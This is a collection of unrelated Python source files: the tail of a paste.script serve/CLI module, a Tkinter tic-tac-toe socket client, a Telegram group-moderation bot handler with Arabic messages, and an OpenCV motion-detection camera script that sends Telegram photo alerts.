    refused.  Servers should call like::

        import paste.script
        ensure_port_cleanup([80, 443])
    """
    atexit.register(_cleanup_ports, bound_addresses, maxtries=maxtries,
                    sleeptime=sleeptime)


def _cleanup_ports(bound_addresses, maxtries=30, sleeptime=2):
    # Wait for the server to bind to the port.
    for bound_address in bound_addresses:
        for _i in range(maxtries):
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            try:
                sock.connect(bound_address)
            except OSError as e:
                if e.errno != errno.ECONNREFUSED:
                    raise
                break
            else:
                time.sleep(sleeptime)
        else:
            raise SystemExit('Timeout waiting for port.')
        sock.close()


def _turn_sigterm_into_systemexit():
    """
    Attempts to turn a SIGTERM exception into a SystemExit exception.
    """
    def handle_term(signo, frame):
        raise SystemExit
    signal.signal(signal.SIGTERM, handle_term)


# ---- from paste.script.command --------------------------------------

python_version = sys.version.splitlines()[0].strip()

parser = optparse.OptionParser(add_help_option=False,
                               # version='%s from %s (python %s)'
                               # % (dist, dist.location, python_version),
                               usage='%prog [paster_options] COMMAND [command_options]')

parser.add_option(
    '-h', '--help',
    action='store_true',
    dest='do_help',
    help="Show this help message")
parser.disable_interspersed_args()

# @@: Add an option to run this in another Python interpreter

commands = {
    'serve': ServeCommand
}


def run(args=None):
    """Top-level CLI entry point: resolve the command name and invoke it."""
    if (not args and len(sys.argv) >= 2 and os.environ.get('_')
            and sys.argv[0] != os.environ['_'] and os.environ['_'] == sys.argv[1]):
        # probably it's an exe execution
        args = ['exe', os.environ['_']] + sys.argv[2:]
    if args is None:
        args = sys.argv[1:]
    options, args = parser.parse_args(args)
    options.base_parser = parser
    if options.do_help:
        args = ['help'] + args
    if not args:
        print('Usage: %s COMMAND' % sys.argv[0])
        args = ['help']
    command_name = args[0]
    if command_name not in commands:
        command = NotFoundCommand
    else:
        command = commands[command_name]
    invoke(command, command_name, options, args[1:])


def invoke(command, command_name, options, args):
    """Instantiate and run ``command``, exiting the process with its code."""
    try:
        runner = command(command_name)
        exit_code = runner.run(args)
    except BadCommand as e:
        print(e)
        exit_code = e.exit_code
    sys.exit(exit_code)
StatePlayGame.py
from ButtonClickHandler import PlayGameButtons as P
from GUI import root, tk, MyButton
from datetime import datetime
import threading
import socket
import json
import time
import sys
import GUI


class Client(object):
    """TCP client exchanging JSON messages with the tic-tac-toe server
    (localhost:9090) and translating server commands into game actions."""

    def __init__(self, game):
        try:
            self.game = game
            self.server = ('localhost', 9090)
            self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            # Limit the connect attempt to 3 seconds, then go fully blocking.
            self.s.settimeout(3)
            self.s.connect(self.server)
            self.s.settimeout(None)
            self.disconnect = False
            self.init_client_on_server = False
            self.start()
        except Exception as e:
            print('AFTER WAITING 3 SECONDS')
            print('CONNECTION FAILED')
            print(e)
            P.main_menu_click()

    # receiving jsons from Server and apply specific actions to Game
    def receiving(self, name, sock):
        """Background-thread loop: read server packets until disconnect."""
        print('RECEIVING MODE')
        while not self.disconnect:
            try:
                while True:
                    if not self.init_client_on_server:
                        # Handshake: give the server 3 seconds for its first packet.
                        try:
                            self.s.settimeout(3)
                            data = self.s.recv(1024)
                            self.s.settimeout(None)
                            self.handle_server_response(data)
                            self.init_client_on_server = True
                        except Exception as e:
                            print('On init phase: ', e)
                            self.disconnect = True
                            break
                    else:
                        # normal mode
                        data = self.s.recv(1024)
                        self.handle_server_response(data)
            except Exception as e:
                print(f'while receiving an error occured: {e}')
                self.disconnect = True
        print('STOP RECEIVING DATA FROM SERVER')
        self.game.stop_thread_and_go_to_MainMenu()

    def response(self, player, used_cell):
        """Send this player's move (the clicked cell id) to the server."""
        r = {
            'time': datetime.now().strftime('%Y-%m-%d %H:%M:%S'),
            'player': player,
            'used_cell': used_cell,
        }
        r = json.dumps(r, ensure_ascii=False).encode("utf-8")
        self.s.sendall(r)

    def handle_server_response(self, r):
        """Decode a server packet and apply the command it carries to the game."""
        print('DATA RECEIVED FROM SERVER')
        f = r.decode("utf-8")
        if f == 'Are you connected?)':
            print(f'Server asked: {f}')
            self.init_client_on_server = True
            self.game.update_status(1)
        else:
            r = json.loads(r)
            print(json.dumps(r, indent=4, sort_keys=True, ensure_ascii=False))
            cmd = r['command']
            print(f'cmd = {cmd}')
            if cmd == 'init_player':
                self.game.me = r['player']
                GUI.root.title(f"[ID: {r['player']['addr'][1]}] "
                               f"{r['player']['nickname']} - {r['player']['symbol']}")
                GUI.root.update()
                print('client was successfuly initialized with')
            # 'loose'/'victory' commands carry the winning combo id as last char.
            if 'loose' in cmd:
                self.game.draw_BACK_TO_MAIN_MENU_button()
                self.game.update_status(3)
                self.game.highlight_win_combo(cmd[-1], 'red')
            if 'victory' in cmd:
                self.game.draw_BACK_TO_MAIN_MENU_button()
                self.game.update_status(4)
                self.game.highlight_win_combo(cmd[-1], 'green')
            if cmd == 'draw':
                self.game.draw_BACK_TO_MAIN_MENU_button()
                self.game.update_status(5)
            if cmd == 'redraw_playboard':
                print('executing "redraw_playboard"')
                self.game.redraw_playboard(r['used_cells'])
            if cmd == 'unblock_playboard':
                print('executing "unblock_playboard"')
                self.game.update_status(2)
                self.game.unblock_playboard(r['used_cells'])
            # NOTE: 'hte' is the exact wire string the server sends; do not "fix" it.
            if cmd == 'opponent left hte game':
                self.game.draw_BACK_TO_MAIN_MENU_button()
                self.game.update_status(7)

    def start(self):
        """Spawn the receiving thread (non-daemon, same as the original)."""
        self.rT = threading.Thread(target=self.receiving,
                                   args=("SomeGoodFuncName", self.s))
        self.rT.daemon = False
        self.rT.start()


class StatePlayGame(object):
    """Tkinter play-board state: builds the 3x3 grid, wires buttons to the
    network client, and reflects server-driven game status in the UI."""

    def __init__(self):
        print('STATE_PLAYBOARD')
        self.me = {}  # player info
        self.type = ''
        self.exit = False
        self.GAME_WIDTH = GUI.GAME_WIDTH
        self.GAME_HEIGHT = GUI.GAME_HEIGHT
        self.BTN_WIDTH = 0.45 * self.GAME_WIDTH
        self.BTN_HEIGHT = 0.14 * self.GAME_HEIGHT
        self.play_board_size = 500
        self.btn_size = 0.3 * self.play_board_size
        # playboard background
        self.container = tk.Label(GUI.SCREEN, bg='black')
        self.container.place(rely=0.5,
                             relx=0.5,
                             anchor=tk.CENTER,
                             width=self.play_board_size,
                             height=self.play_board_size
                             )
        self.container.update()
        formula = self.btn_size + 0.05 * self.play_board_size
        y = [-2, formula - 2, formula * 2]
        # placing buttons from right to left,
        # naming buttons from left to rigth
        fix = [2, 1, 0]
        self.btn_dict = {}
        for i in [1, 2, 3]:
            for j in [2, 1, 0]:
                name = f'btn_{i * 3 - fix[j]}'
                self.btn_dict[name] = tk.Button(self.container,
                                                text='',
                                                font=('Helvetica', 100, 'bold'),
                                                borderwidth=0
                                                )
                self.btn_dict[name].place(x=(j * formula - 2),
                                          y=y[i - 1],
                                          width=int(self.btn_size),
                                          height=int(self.btn_size)
                                          )
        # Replaces nine copy-pasted config calls; the default argument binds
        # each button's own name at definition time (avoids late binding).
        for n in range(1, 10):
            self.btn_dict[f'btn_{n}'].config(
                command=lambda name=f'btn_{n}': self.draw_X_O(name))

        style = tk.ttk.Style()
        style.configure('KEKOS.TButton', font=('Verdana', 20, 'bold'))
        style_enter = tk.ttk.Style()
        style_enter.configure('Enter.TButton',
                              foreground='green',
                              font=('Verdana', 20, 'bold')
                              )
        style_leave = tk.ttk.Style()
        # BUG FIX: option was misspelled 'bakcground', so ttk silently stored a
        # bogus option and the red background never applied.
        style_leave.configure('Leave.TButton',
                              background='red',
                              font=('Verdana', 20, 'bold')
                              )
        self.draw_win_loose_label()
        self.block_playboard()
        try:
            self.client = Client(self)
        except Exception as e:
            print('While trying to init Client() ->', e)
            self.connection_failed()
        # closing all connections and threads on WINDOW CLOSE
        GUI.root.protocol("WM_DELETE_WINDOW", lambda: on_closing_playgame(self))

    def connection_failed(self):
        print('Server refused connection')
        P.main_menu_click()

    def stop_thread_and_go_to_MainMenu(self):
        """Shut down the client connection and return to the main menu."""
        try:
            # BUG FIX: the original called Thread._delete(), a private CPython
            # internal that does not stop a thread.  Setting the exit flag and
            # closing the socket makes the receiving loop end on its own.
            self.exit = True
            time.sleep(0.1)
            self.client.s.close()
            print(f'is Thread alive? -> {self.client.rT.is_alive()}')
            # del self.client
        except Exception as e:
            print('When try to delete Thread an error occured -> ', e)
        print('disconnected')
        P.main_menu_click()

    def draw_BACK_TO_MAIN_MENU_button(self):
        self.btn_main_menu = MyButton(GUI.SCREEN,
                                      text='Back to Main Menu',
                                      style='KEKOS.TButton',
                                      command=lambda: self.stop_thread_and_go_to_MainMenu()
                                      )
        self.btn_main_menu.place(relx=0.5,
                                 y=self.GAME_HEIGHT - (self.GAME_HEIGHT - self.play_board_size) / 4,
                                 height=50,
                                 width=300,
                                 anchor='center'
                                 )
        self.btn_main_menu.bind("<Enter>", self.on_enter)
        self.btn_main_menu.bind("<Leave>", self.on_leave)

    # events for BACK TO MAIN MENU BUTOON
    def on_enter(self, e):
        self.btn_main_menu._btn.config(style='Enter.TButton')
        self.btn_main_menu.update()

    def on_leave(self, e):
        self.btn_main_menu._btn.config(style='Leave.TButton')
        self.btn_main_menu.update()

    def draw_X_O(self, btn):
        """Place this player's symbol on cell `btn`, lock the board, notify server."""
        # BUG FIX: `is 'X'` tested object identity; `==` is the correct
        # string-equality test (identity on literals is a CPython accident).
        if self.me['symbol'] == 'X':
            self.btn_dict[btn].config(text='X')
        if self.me['symbol'] == 'O':
            self.btn_dict[btn].config(text='O')
        self.block_playboard()
        self.update_status(6)
        self.client.response(self.me, btn)

    def draw_win_loose_label(self):
        self.l = tk.Label(GUI.SCREEN, font=('Helvetica', 20, 'bold'), fg='green')
        self.l.place(y=self.container.winfo_y() / 2,
                     relx=0.5,
                     anchor=tk.CENTER,
                     width=self.container.winfo_width(),
                     height=self.GAME_HEIGHT * 0.15,
                     )
        self.l.update()

    def update_status(self, status):
        """Show the status banner; codes map to fixed texts/colors."""
        messages = {
            1: ('WAITING FOR PLAYERS...', 'green'),
            2: ('Your turn!', 'green'),
            3: ('YOU LOOSE :(', 'red'),
            4: ('!!! YOU WIN !!!', 'green'),
            5: ('DRAW', 'green'),
            6: ('Opponent`s turn', 'green'),
            7: ('Opponent left the game :(', 'red'),
        }
        if status in messages:
            txt, color = messages[status]
            self.l.config(text=txt, fg=color)

    def update_all_buttons(self):
        for btn in self.btn_dict.keys():
            self.btn_dict[btn].config(bg='SystemButtonFace')

    def block_playboard(self):
        """Disable every cell (no-op command) and mark the board black."""
        self.container.config(bg='black')
        self.container.update()
        self.update_all_buttons()
        for btn in self.btn_dict.keys():
            self.btn_dict[btn].config(command=lambda: ())

    def unblock_playboard(self, buttons_to_block):
        """Re-enable only the cells that are still empty ('' in the dict)."""
        self.container.config(bg='green')
        self.container.update()
        self.update_all_buttons()
        # BUG FIX: original used `is ''` (identity) nine times; `== ''` is the
        # correct emptiness test.  Default argument pins each cell name.
        for n in range(1, 10):
            name = f'btn_{n}'
            if buttons_to_block[name] == '':
                self.btn_dict[name].config(
                    command=lambda name=name: self.draw_X_O(name))

    def redraw_playboard(self, playboard):
        for btn in self.btn_dict:
            # BUG FIX: `is not ''` replaced with `!= ''` (equality, not identity).
            if playboard[btn] != '':
                self.btn_dict[btn].config(text=playboard[btn])

    # defined all win combos
    def highlight_win_combo(self, combo, color):
        """Color the three cells of winning combo 1-8 (rows, columns, diagonals)."""
        combos = {
            1: (1, 2, 3), 2: (4, 5, 6), 3: (7, 8, 9),
            4: (1, 4, 7), 5: (2, 5, 8), 6: (3, 6, 9),
            7: (1, 5, 9), 8: (3, 5, 7),
        }
        for n in combos.get(int(combo), ()):
            self.btn_dict[f'btn_{n}'].config(fg=color)

    def __del__(self):
        # NOTE: the original also did `del self`, which only unbinds the local
        # name and has no effect on the instance; removed.
        print('Client instance deleted!')


# apply this actions "on closing" tkinter window
def on_closing_playgame(obj):
    """WM_DELETE_WINDOW handler: stop the client connection and exit."""
    try:
        obj.exit = True
        print('closing window')
        # stop connection + obj.exit=True => break "while True" in Thread
        try:
            obj.client.s.close()
        except Exception as e:
            print('while trying to CLOSE CONNECTION: ', e)
        print('disconnected')
        raise SystemExit(0)
    except Exception as e:
        print(f'while closing from STATE_PLAY_GAME: {e}')
        raise SystemExit(0)
msg.py
from utlis.rank import setrank ,isrank ,remrank ,setsudos ,remsudos ,setsudo,IDrank,GPranks
from utlis.send import send_msg, BYusers, sendM,Glang,GetLink
from handlers.delete import delete
from utlis.tg import Bot, Ckuser
from handlers.ranks import ranks
from handlers.locks import locks
from handlers.gpcmd import gpcmd
from handlers.sudo import sudo
from handlers.all import allGP
from utlis.tg import Bot,Del24
from config import *
from pyrogram import ReplyKeyboardMarkup, InlineKeyboardMarkup, InlineKeyboardButton
import threading, requests, time, random, re , json,datetime,importlib


def updateHandlers(client, message, redis):
    """Dispatch an incoming Telegram update to the right handler thread.

    Routing depends on the sender's rank (stored in redis) and whether the
    chat is an activated group.  BUG FIX applied throughout: the original
    compared strings with `is` (identity) — a CPython-interning accident —
    replaced everywhere with `==` / `in`.
    """
    # Global maintenance switch: ignore all updates while set.
    if redis.get("{}Nbot:bigM".format(BOT_ID)):
        return False
    type = message.chat.type  # keeps original name (shadows builtin `type`)
    try:
        userID = message.from_user.id
        chatID = message.chat.id
    except Exception as e:
        return 0
    c = importlib.import_module("lang.arcmd")
    r = importlib.import_module("lang.arreply")
    if type in ("supergroup", "group") and message.outgoing != True:
        userID = message.from_user.id
        chatID = message.chat.id
        rank = isrank(redis, userID, chatID)
        group = redis.sismember("{}Nbot:groups".format(BOT_ID), chatID)
        text = message.text
        title = message.chat.title
        # --- group not yet activated -----------------------------------
        if text and group is False:
            if rank in ("sudo", "sudos", "asudo") or (redis.get("{}Nbot:autoaddbot".format(BOT_ID)) and GPranks(userID, chatID) == "creator"):
                if text == c.add:
                    if redis.get("{}Nbot:autoaddbotN".format(BOT_ID)):
                        auN = int(redis.get("{}Nbot:autoaddbotN".format(BOT_ID)))
                    else:
                        auN = 1
                    # Too few members to activate (sudo ranks bypass the check).
                    if auN >= Bot("getChatMembersCount", {"chat_id": chatID})["result"] and rank not in ("sudo", "sudos"):
                        Bot("sendMessage", {"chat_id": chatID, "text": r.Toolow.format((int(redis.get("{}Nbot:autoaddbotN".format(BOT_ID))) or 0)), "reply_to_message_id": message.message_id, "parse_mode": "html"})
                        return False
                    # The bot needs full admin rights before activation.
                    GetME = Bot("getChatMember", {"chat_id": chatID, "user_id": BOT_ID})["result"]
                    if (not GetME["can_change_info"] or not GetME["can_delete_messages"]
                            or not GetME["can_invite_users"] or not GetME["can_restrict_members"]
                            or not GetME["can_pin_messages"] or not GetME["can_promote_members"]):
                        Bot("sendMessage", {"chat_id": chatID, "text": r.GiveMEall, "reply_to_message_id": message.message_id, "parse_mode": "html"})
                        return False
                if text == c.add and not redis.sismember("{}Nbot:disabledgroups".format(BOT_ID), chatID) and Ckuser(message):
                    # Fresh activation: enable default locks, import admin list.
                    locksarray = {'Llink', 'Llongtext', 'Lmarkdown', 'Linline', 'Lfiles', 'Lcontact', 'Lbots', 'Lfwd', 'Lnote'}
                    for lock in locksarray:
                        redis.sadd("{}Nbot:{}".format(BOT_ID, lock), chatID)
                    ads = Bot("getChatAdministrators", {"chat_id": chatID})
                    for ad in ads['result']:
                        userId = ad["user"]["id"]
                        userFn = ad["user"]["first_name"]
                        if ad['status'] == "administrator" and int(userId) != int(BOT_ID):
                            setrank(redis, "admin", userId, chatID, "array")
                        if ad['status'] == "creator":
                            setrank(redis, "malk", userId, chatID, "one")
                    add = redis.sadd("{}Nbot:groups".format(BOT_ID), chatID)
                    Bot("exportChatInviteLink", {"chat_id": chatID})
                    kb = InlineKeyboardMarkup([[InlineKeyboardButton(r.MoreInfo, url="t.me/src_top")]])
                    Bot("sendMessage", {"chat_id": chatID, "text": r.doneadd.format(title), "reply_to_message_id": message.message_id, "parse_mode": "markdown", "reply_markup": kb})
                    # Notify the sudo log group about the new activation.
                    sendTO = (redis.get("{}Nbot:sudogp".format(BOT_ID)) or SUDO)
                    get = (redis.hget("{}Nbot:links".format(BOT_ID), chatID) or GetLink(chatID) or "https://t.me/src_top")
                    kb = InlineKeyboardMarkup([[InlineKeyboardButton("الرابط 🖇", url=get)]])
                    BY = "<a href=\"tg://user?id={}\">{}</a>".format(userID, message.from_user.first_name)
                    Bot("sendMessage", {"chat_id": sendTO, "text": f"تم تفعيل مجموعه جديدة ℹ️\nاسم المجموعه : {title}\nايدي المجموعه : {chatID}\nالمنشئ : {BY}\n⎯ ⎯ ⎯ ⎯", "parse_mode": "html", "reply_markup": kb})
                elif text == c.add and redis.sismember("{}Nbot:disabledgroups".format(BOT_ID), chatID) and Ckuser(message):
                    # Re-activation of a previously disabled group.
                    redis.sadd("{}Nbot:groups".format(BOT_ID), chatID)
                    redis.srem("{}Nbot:disabledgroups".format(BOT_ID), chatID)
                    redis.hdel("{}Nbot:disabledgroupsTIME".format(BOT_ID), chatID)
                    Bot("sendMessage", {"chat_id": chatID, "text": r.doneadd2.format(title), "reply_to_message_id": message.message_id, "parse_mode": "markdown"})
                if text == c.disabl and Ckuser(message):
                    Bot("sendMessage", {"chat_id": chatID, "text": r.disabled.format(title), "reply_to_message_id": message.message_id, "parse_mode": "markdown"})
        # --- group already activated ------------------------------------
        if text and group is True:
            if rank in ("sudo", "sudos", "asudo") or (redis.get("{}Nbot:autoaddbot".format(BOT_ID)) and GPranks(userID, chatID) == "creator"):
                if text == c.add and Ckuser(message):
                    Bot("sendMessage", {"chat_id": chatID, "text": r.doneadded.format(title), "reply_to_message_id": message.message_id, "parse_mode": "markdown"})
                if text == c.disabl and Ckuser(message):
                    redis.srem("{}Nbot:groups".format(BOT_ID), chatID)
                    redis.sadd("{}Nbot:disabledgroups".format(BOT_ID), chatID)
                    NextDay_Date = datetime.datetime.today() + datetime.timedelta(days=1)
                    redis.hset("{}Nbot:disabledgroupsTIME".format(BOT_ID), chatID, str(NextDay_Date))
                    kb = InlineKeyboardMarkup([[InlineKeyboardButton(r.MoreInfo, url="t.me/src_top")]])
                    Bot("sendMessage", {"chat_id": chatID, "text": r.disabl.format(title), "reply_to_message_id": message.message_id, "parse_mode": "markdown", "reply_markup": kb})
        if group is True:
            t = threading.Thread(target=allGP, args=(client, message, redis))
            t.daemon = True
            t.start()
        if text and group is True:
            # Custom text orders: replace an alias with its target command.
            # BUG FIX: original built the pattern as f"^\{x[0]}$", escaping only
            # the FIRST character; re.escape handles the whole alias safely.
            if redis.sismember("{}Nbot:publicOrders".format(BOT_ID), chatID):
                for raw in redis.smembers("{}Nbot:{}:TXPoeders".format(BOT_ID, chatID)):
                    try:
                        parts = raw.split("=")
                        if re.search("^{}$".format(re.escape(parts[0])), text) or re.search("^{} (.*)$".format(re.escape(parts[0])), text):
                            text = text.replace(parts[0], parts[1])
                    except Exception as e:
                        print(e)
                message.text = text
            for raw in redis.smembers("{}Nbot:{}:TXoeders".format(BOT_ID, chatID)):
                try:
                    parts = raw.split("=")
                    if re.search("^{}$".format(re.escape(parts[0])), text) or re.search("^{} (.*)$".format(re.escape(parts[0])), text):
                        text = text.replace(parts[0], parts[1])
                except Exception as e:
                    print(e)
            message.text = text
        # --- per-rank handler threads -----------------------------------
        if rank in ("sudo", "sudos", "asudo") and group is True:
            t = threading.Thread(target=sudo, args=(client, message, redis))
            t.daemon = True
            t.start()
        if text and rank in ("sudo", "asudo", "sudos", "malk", "acreator", "creator", "owner") and group is True:
            t = threading.Thread(target=ranks, args=(client, message, redis))
            t.daemon = True
            t.start()
        if text and rank in ("sudo", "asudo", "sudos", "malk", "acreator", "creator", "owner", "admin") and group is True and re.search(c.startlock, text):
            if Ckuser(message):
                t = threading.Thread(target=locks, args=(client, message, redis))
                t.daemon = True
                t.start()
        if (rank is False or rank == 0) and group is True:
            t = threading.Thread(target=delete, args=(client, message, redis))
            t.daemon = True
            t.start()
        if rank in ("sudo", "asudo", "sudos", "malk", "acreator", "creator", "owner", "admin") and group is True:
            t = threading.Thread(target=gpcmd, args=(client, message, redis))
            t.daemon = True
            t.start()
    if type == "private" and message.outgoing != True:
        text = message.text
        rank = isrank(redis, userID, chatID)
        if rank in ("sudo", "asudo", "sudos"):
            t = threading.Thread(target=sudo, args=(client, message, redis))
            t.daemon = True
            t.start()
        if text and re.search("^/start$", text):
            userID = message.from_user.id
            userFN = message.from_user.first_name
            redis.sadd("{}Nbot:privates".format(BOT_ID), userID)
            if rank == "sudo":
                kb = ReplyKeyboardMarkup([[r.RKgp, r.RKgpl], [r.RKaf, r.RKrf], [r.RKf], ["جلب نسخه احتياطيه"], [r.RKub]], resize_keyboard=True)
                Bot("sendMessage", {"chat_id": chatID, "text": r.sudostart, "reply_to_message_id": message.message_id, "parse_mode": "html", "reply_markup": kb})
                return 0
            getbot = client.get_me()
            kb = InlineKeyboardMarkup([[InlineKeyboardButton("TshakeTeam", url="t.me/src_top")]])
            Bot("sendMessage", {"chat_id": chatID, "text": r.botstart.format(getbot.first_name, getbot.username), "reply_to_message_id": message.message_id, "parse_mode": "html", "reply_markup": kb})
        if text and re.search("^/start (.*)$", text):
            # Deep-link payload: "<order>=<chatId>=<userId>=<type>".
            tx = text.replace("/start ", "")
            split = tx.split("=")
            order = split[0]
            if order == "showreplylistBOT":
                chatId = split[1]
                userId = split[2]
                TY = split[3]
                rank = isrank(redis, userId, chatId)
                if rank in ("sudo", "asudo", "sudos"):
                    li = redis.hkeys("{}Nbot:{}".format(BOT_ID, TY))
                    if li:
                        i = 1
                        words = ""
                        for word in li:
                            words = words + "\n" + str(i) + " - {" + word + "}"
                            i += 1
                            # Flush in <=3000-char pieces (Telegram message limit).
                            if len(words) > 3000:
                                Bot("sendMessage", {"chat_id": userId, "text": words, "reply_to_message_id": message.message_id, "parse_mode": "html"})
                                words = ''
                        Bot("sendMessage", {"chat_id": userId, "text": words, "reply_to_message_id": message.message_id, "parse_mode": "html"})
                        reply_markup = InlineKeyboardMarkup([[InlineKeyboardButton(r.Delall2R, callback_data=json.dumps(["del{}".format(TY + 'BOT'), "", userID])), ]])
                        Bot("sendMessage", {"chat_id": chatID, "text": r.DelallR, "reply_to_message_id": message.message_id, "disable_web_page_preview": True, "reply_markup": reply_markup})
            if order == "showreplylist":
                chatId = split[1]
                userId = split[2]
                TY = split[3]
                group = redis.sismember("{}Nbot:groups".format(BOT_ID), chatId)
                rank = isrank(redis, userId, chatId)
                # BUG FIX: original `or`-chain of inequalities was always True;
                # the intent is to exclude unranked/vip/admin users.
                if rank not in (False, 0, "vip", "admin") and group is True:
                    li = redis.hkeys("{}Nbot:{}:{}".format(BOT_ID, chatId, TY))
                    if li:
                        i = 1
                        words = ""
                        for word in li:
                            words = words + "\n" + str(i) + " - {" + word + "}"
                            i += 1
                            if len(words) > 3000:
                                Bot("sendMessage", {"chat_id": userId, "text": words, "reply_to_message_id": message.message_id, "parse_mode": "html"})
                                words = ''
                        Bot("sendMessage", {"chat_id": userId, "text": words, "reply_to_message_id": message.message_id, "parse_mode": "html"})
                        reply_markup = InlineKeyboardMarkup([[InlineKeyboardButton(r.Delall2R, callback_data=json.dumps(["del{}".format(TY), chatId, userID])), ]])
                        Bot("sendMessage", {"chat_id": chatID, "text": r.DelallR, "reply_to_message_id": message.message_id, "disable_web_page_preview": True, "reply_markup": reply_markup})
            if order == "showBlocklist":
                chatId = split[1]
                userId = split[2]
                TY = split[3]
                group = redis.sismember("{}Nbot:groups".format(BOT_ID), chatId)
                rank = isrank(redis, userId, chatId)
                # BUG FIX: same always-True `or`-chain corrected as above.
                if rank not in (False, 0, "vip") and group is True:
                    # NOTE(review): this hset looks misplaced (writes a TXreplys
                    # entry keyed by the deep-link payload); kept as-is.
                    redis.hset("{}Nbot:{}:TXreplys".format(BOT_ID, chatID), tx, text)
                    li = redis.smembers("{}Nbot:{}:{}".format(BOT_ID, chatId, TY))
                    if li:
                        i = 1
                        words = ""
                        for ID in li:
                            reply_markup = InlineKeyboardMarkup([[InlineKeyboardButton(r.Blocklistone, callback_data=json.dumps(["delfromb", TY, userID, chatId])), ]])
                            if TY == "blockanimations":
                                Bot("sendAnimation", {"chat_id": userId, "animation": ID, "reply_markup": reply_markup})
                            if TY == "blockSTICKERs":
                                Bot("sendSticker", {"chat_id": userId, "sticker": ID, "reply_markup": reply_markup})
                            if TY == "blockphotos":
                                Bot("sendPhoto", {"chat_id": userId, "photo": ID, "reply_markup": reply_markup})
                            if TY == "blockTEXTs":
                                words = words + "\n" + str(i) + " - {" + ID + "}"
                                i += 1
                                print(len(words))
                                if len(words) > 3000:
                                    Bot("sendMessage", {"chat_id": userId, "text": words, "reply_to_message_id": message.message_id, "parse_mode": "html"})
                                    words = ''
                        if TY == "blockTEXTs":
                            Bot("sendMessage", {"chat_id": userId, "text": words, "reply_to_message_id": message.message_id, "parse_mode": "html"})
                        reply_markup = InlineKeyboardMarkup([[InlineKeyboardButton(r.Delall2, callback_data=json.dumps(["delBL", TY, userID, chatId])), ]])
                        Bot("sendMessage", {"chat_id": userId, "text": r.Delall, "reply_to_message_id": message.message_id, "parse_mode": "html", "reply_markup": reply_markup})
                    else:
                        Bot("sendMessage", {"chat_id": userId, "text": r.listempty2, "reply_to_message_id": message.message_id, "parse_mode": "html"})
Main.py
import cv2
from Camera import Camera
from MovimentDetection import MovimentDetection
from ObjectDetection import ObjectDetection
from FaceDetection import FaceDetection
from TimerProcess import TimerProcess
from TelegramBot import TelegramBot
import Rectangles
from threading import Thread
import time


def showFrame(frame):
    """Display the current frame in the preview window."""
    cv2.imshow('camera frame', frame)


def waitKeyPress():
    return cv2.waitKey(1)


def selectRectangleForMinArea(frame):
    """Let the user draw an ROI; its area becomes the movement-size threshold."""
    global movimentDetection
    rect = cv2.selectROI(frame)
    area = Rectangles.calculateArea(rect)
    movimentDetection.objectMinArea = area
    cv2.destroyAllWindows()


def recognizeMovingObjects(frame, objectNames):
    """Return (label, rect, id) tuples for moving objects whose detected
    class is in `objectNames`.  Only the biggest moving region is classified."""
    global movimentDetection
    global objectDetection
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    objects, rectangles = movimentDetection.getMovimentObjects(gray)
    detectedMovingObjects = []
    if rectangles:
        biggestRect = Rectangles.getBiggest(rectangles)
        # Pad the region so the classifier sees some context around the object.
        expandedRectangle = Rectangles.expand(biggestRect, 100)
        objectImage = Rectangles.getImage(expandedRectangle, frame)
        detectedObjects = objectDetection.detect(objectImage)
        for detectedObject in detectedObjects:
            label, rect, id = detectedObject
            if label in objectNames:
                detectedMovingObjects.append((label, expandedRectangle, id))
    return detectedMovingObjects


def detectObjects(frame):
    """Draw boxes and labels for every object detected in `frame` (in place)."""
    global objectDetection
    detectedObjects = objectDetection.detect(frame)
    for detectedObject in detectedObjects:
        label, rect, id = detectedObject
        Rectangles.draw([rect], frame)
        cv2.putText(frame, label, (rect[0], rect[1] + 20),
                    cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 1)


def detectFaces(frame):
    """Draw a box around each detected face and show the face crop."""
    global faceDetection
    detectedFaces = faceDetection.detect(frame)
    for detectedFace in detectedFaces:
        objectImage = Rectangles.getImage(detectedFace, frame)
        Rectangles.draw([detectedFace], frame)
        cv2.imshow("detected face", objectImage)


def addDataToTimer(data):
    """Accumulate a detection into the 5-second aggregation window."""
    global timerProcess
    # BUG FIX (idiom): `== None` replaced with `is None` throughout this file.
    if timerProcess is None:
        timerProcess = TimerProcess(5)
    timerProcess.addData(data)


def checkMovingObjects(data):
    """If any label was seen >20 times in the window, send its biggest crop to
    Telegram and start a 15s idle period to avoid repeated alerts."""
    global idleTimerProcess
    labels = [x[0] for x in data]
    distinctLabels = list(set(labels))
    for label in distinctLabels:
        labelsImgs = [x[2] for x in data if x[0] == label]
        if len(labelsImgs) > 20:
            biggestImg = Rectangles.getBiggestImage(labelsImgs)
            cv2.imwrite("sendimage.jpg", biggestImg)
            telegramBot.sendPhoto(telegramChatId, "sendimage.jpg")
            idleTimerProcess = TimerProcess(15)
            # for img in labelsImgs:
            #     cv2.imshow("biggest image", img)
            #     cv2.waitKey(0)
            #     cv2.imwrite("images/image" + str(labelsImgs.index(img)) + ".jpg", img)
            # biggestImg = Rectangles.getBiggestImage(labelsImgs)


def main():
    """Capture loop: detect moving objects, aggregate them, and react to keys
    (q = quit, s = set min area ROI, p = save a snapshot ROI)."""
    global idleTimerProcess
    global timerProcess
    camera = Camera(cameraInput)
    camera.openVideo()
    while True:
        frame = camera.getFrame()
        frame = cv2.resize(frame, (0, 0), fx=0.5, fy=0.5)
        if idleTimerProcess is None:
            objects = recognizeMovingObjects(
                frame, ["person", "car", "dog", "cat", "sheep"])
            # Renamed from `object` (shadowed the builtin).
            for obj in objects:
                label, rect, classId = obj
                objectImg = Rectangles.getImage(rect, frame)
                addDataToTimer([label, rect, objectImg])
        elif idleTimerProcess.isClosed():
            idleTimerProcess = None
        if timerProcess is not None and timerProcess.isClosed():
            timerData = timerProcess.getData()
            timerProcess = None
            # checkMovingObjects(timerData)
            thread = Thread(target=checkMovingObjects, args=(timerData, ))
            thread.start()
        showFrame(frame)
        pressedKey = waitKeyPress()
        if pressedKey == ord('q'):
            break
        if pressedKey == ord('s'):
            selectRectangleForMinArea(frame)
        if pressedKey == ord('p'):
            rect = cv2.selectROI(frame)
            cv2.destroyAllWindows()
            objectImage = Rectangles.getImage(rect, frame)
            cv2.imwrite('image.jpg', objectImage)
    cv2.destroyAllWindows()


telegramToken = "TELEGRAM-TOKEN"
telegramChatId = 0  # Id do chat do telegram
# BUG FIX: the original template had a stray '}' after {ip}.  The {user},
# {password} and {ip} placeholders must still be filled in before use.
cameraInput = "rtsp://{user}:{password}@{ip}/live/mpeg4"

